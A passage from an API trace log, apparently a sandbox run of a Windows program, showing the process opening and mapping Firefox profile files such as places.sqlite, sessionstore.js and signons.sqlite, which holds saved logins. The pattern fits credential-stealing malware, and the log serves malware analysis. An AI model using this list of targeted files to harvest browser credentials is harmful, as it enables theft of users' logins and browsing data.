(lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.508] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.508] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.508] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.508] CloseHandle (hObject=0x668) returned 1 [0590.508] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0590.508] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x2ed9860 [0590.508] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", lpDst=0x2ed9860, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite") returned 0x5a [0590.508] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.508] CloseHandle (hObject=0x668) returned 1 [0590.508] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.508] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa00000 [0590.508] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.508] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.602] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.602] LocalFree (hMem=0x56cab0) returned 0x0 [0590.602] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.602] lstrlenW (lpString="\\") returned 1 [0590.602] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.602] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.602] lstrlenW (lpString="pluginreg.dat") returned 13 [0590.602] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.602] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.602] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.602] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.602] CloseHandle (hObject=0x668) returned 1 [0590.602] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0590.602] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x2ed9860 [0590.602] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", lpDst=0x2ed9860, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat") returned 0x5a [0590.602] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.602] CloseHandle (hObject=0x668) returned 1 [0590.602] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.602] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc91 [0590.602] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.602] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.602] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.602] LocalFree (hMem=0x56cab0) returned 0x0 [0590.602] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.602] lstrlenW (lpString="\\") returned 1 [0590.603] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.603] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.603] lstrlenW (lpString="prefs.js") returned 8 [0590.603] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.603] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63bbf0 [0590.603] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.603] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.603] CloseHandle (hObject=0x668) returned 1 [0590.603] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0590.603] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63bd28 [0590.603] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", lpDst=0x63bd28, nSize=0x55 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js") returned 0x55 [0590.603] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.603] CloseHandle (hObject=0x668) returned 1 [0590.603] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.603] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1540 [0590.603] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.603] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.603] LocalFree (hMem=0x63bd28) returned 0x0 [0590.603] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.603] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.603] lstrlenW (lpString="\\") returned 1 [0590.603] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.603] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.603] lstrlenW (lpString="search.json") returned 11 [0590.603] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.603] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bbf0 [0590.603] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.603] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.604] CloseHandle (hObject=0x668) returned 1 [0590.604] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0590.604] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bd28 [0590.604] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", lpDst=0x63bd28, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json") returned 0x58 [0590.604] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.604] CloseHandle (hObject=0x668) returned 1 [0590.604] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.604] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4183 [0590.604] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.604] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.604] LocalFree (hMem=0x63bd28) returned 0x0 [0590.604] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.604] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.604] lstrlenW (lpString="\\") returned 1 [0590.604] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.604] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.604] lstrlenW (lpString="secmod.db") returned 9 [0590.604] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.604] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bbf0 [0590.604] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.604] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.605] CloseHandle (hObject=0x668) returned 1 [0590.605] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x56 [0590.605] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bd28 [0590.605] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", lpDst=0x63bd28, nSize=0x56 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db") returned 0x56 [0590.605] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.605] CloseHandle (hObject=0x668) returned 1 [0590.605] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.605] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4000 [0590.605] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.605] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.605] LocalFree (hMem=0x63bd28) returned 0x0 [0590.605] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.605] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.605] lstrlenW (lpString="\\") returned 1 [0590.605] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.605] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.605] lstrlenW (lpString="sessionstore.bak") returned 16 [0590.605] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.605] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56cab0 [0590.605] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.605] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.605] CloseHandle (hObject=0x668) returned 1 [0590.606] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5d [0590.606] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x2ed9860 [0590.606] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", lpDst=0x2ed9860, nSize=0x5d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak") returned 0x5d [0590.606] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.606] CloseHandle (hObject=0x668) returned 1 [0590.606] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.606] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbba [0590.606] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.606] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.606] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.606] LocalFree (hMem=0x56cab0) returned 0x0 [0590.606] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.606] lstrlenW (lpString="\\") returned 1 [0590.606] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.606] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.606] lstrlenW (lpString="sessionstore.js") returned 15 [0590.606] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.606] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56cab0 [0590.606] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.606] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.606] CloseHandle (hObject=0x668) returned 1 [0590.606] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5c [0590.606] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x2ed9860 [0590.606] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", lpDst=0x2ed9860, nSize=0x5c | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js") returned 0x5c [0590.606] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.606] CloseHandle (hObject=0x668) returned 1 [0590.607] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.607] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x23c [0590.607] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.607] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.607] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.607] LocalFree (hMem=0x56cab0) returned 0x0 [0590.607] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.607] lstrlenW (lpString="\\") returned 1 [0590.607] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.607] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.607] lstrlenW (lpString="signons.sqlite") returned 14 [0590.607] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.607] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.607] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.607] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.607] CloseHandle (hObject=0x668) returned 1 [0590.607] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.607] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x2ed9860 [0590.607] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", lpDst=0x2ed9860, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite") returned 0x5b [0590.607] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.607] CloseHandle (hObject=0x668) returned 1 [0590.607] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.608] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x50000 [0590.608] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.608] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x24c0000 [0590.611] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.611] lstrlenW (lpString="\\") returned 1 [0590.611] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.611] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.611] lstrlenW (lpString="times.json") returned 10 [0590.611] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.611] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x63bbf0 [0590.611] CreateFileW 